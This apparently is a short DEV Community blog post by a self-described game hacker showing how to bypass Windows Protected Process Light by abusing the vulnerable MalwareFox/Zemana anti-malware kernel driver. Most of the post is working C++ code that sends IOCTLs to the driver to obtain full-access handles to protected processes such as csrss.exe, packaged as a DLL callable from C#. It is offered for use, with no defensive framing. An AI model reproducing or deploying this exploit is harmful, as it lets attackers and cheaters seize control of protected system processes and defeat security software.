DEV Community

loading...

Bypass Windows PPL

Rake
The Don Juan of Game Hacking
・1 min read

You all know, that are many ways to bypass Windows PPL to get full control of (excample csrss.exe).

I can show you a little way.
There are many vulnerable Driver, for example (Razer and Malware Fox).

I found a good Turotial with the MalwareFox driver.
MalwareFox is an free AntiVirus Programm which uses an Kernel Driver.

I recoded the source a little bit, and I can now export the Project as an DLL file and call the methods from a C# Project to get the Handle with full access (for example csrss.exe).


HANDLE MFAM_GH(DWORD pid) {
    HANDLE hDevice = CreateFile(L"\\\\.\\ZemanaAntiMalware", GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
    if (hDevice == INVALID_HANDLE_VALUE)
        return (HANDLE)0x0;
    DWORD ourPID = GetCurrentProcessId();
    if (!DeviceIoControl(hDevice, 0x80002010, &ourPID, sizeof(DWORD), NULL, 0, NULL, NULL)) {
        CloseHandle(hDevice);
        return (HANDLE)0x0;
    }
    HANDLE hProcess = NULL;
    DeviceIoControl(hDevice, 0x8000204C, &pid, sizeof(DWORD), &hProcess, sizeof(HANDLE), NULL, NULL);
    CloseHandle(hDevice);
    return hProcess;
}

HANDLE handle_htest2;

//Gives the Handle to application
extern "C" __declspec(dllexport) void GiveH(int csiid, int prcid)
{
    HANDLE htest = OpenProcess(PROCESS_ALL_ACCESS, FALSE, csiid);
    DWORD pid = csiid;
    DWORD dere = prcid;
    HANDLE hProcess = MFAM_GH(pid);
    handle_htest2 = MFAM_GH(dere);
    return;
}

//Get Handle as variable
extern "C" __declspec(dllexport) HANDLE _handleGet(HANDLE handle_h)
{
    handle_h = handle_htest2;
    return handle_h;
}

Enter fullscreen mode Exit fullscreen mode

image

Original Article by NachoModding

Discussion (0)